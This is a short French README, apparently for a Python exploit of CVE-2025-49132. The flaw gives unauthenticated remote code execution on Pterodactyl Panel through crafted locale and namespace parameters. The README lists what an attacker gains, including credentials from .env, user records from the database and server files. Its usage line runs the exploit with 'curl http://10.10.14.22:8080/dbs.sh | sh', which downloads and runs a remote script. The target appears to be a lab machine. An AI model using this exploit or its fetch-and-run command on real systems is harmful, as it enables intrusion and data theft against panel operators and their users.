
Exploit Python pour CVE-2025-49132, permettant l'exécution de code à distance non authentifiée sur Pterodactyl Panel via des paramètres locale et namespace manipulés.
Impact
En utilisant le fichier /locales/locale.json avec les paramètres de requête locale et namespace, un acteur malveillant peut exécuter du code arbitraire sans être authentifié.
Avec la capacité d'exécuter du code arbitraire, cette vulnérabilité peut être exploitée d'une infinité de façons. Elle pourrait être utilisée pour obtenir un accès au serveur du Panel, lire les identifiants depuis la configuration du Panel (.env ou autre), extraire des informations sensibles de la base de données (telles que les détails des utilisateurs [nom d'utilisateur, email, prénom et nom, mot de passe haché, adresses IP, etc.]), accéder aux fichiers des serveurs gérés par le panel, etc.
Comment utiliser
python exploit.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh'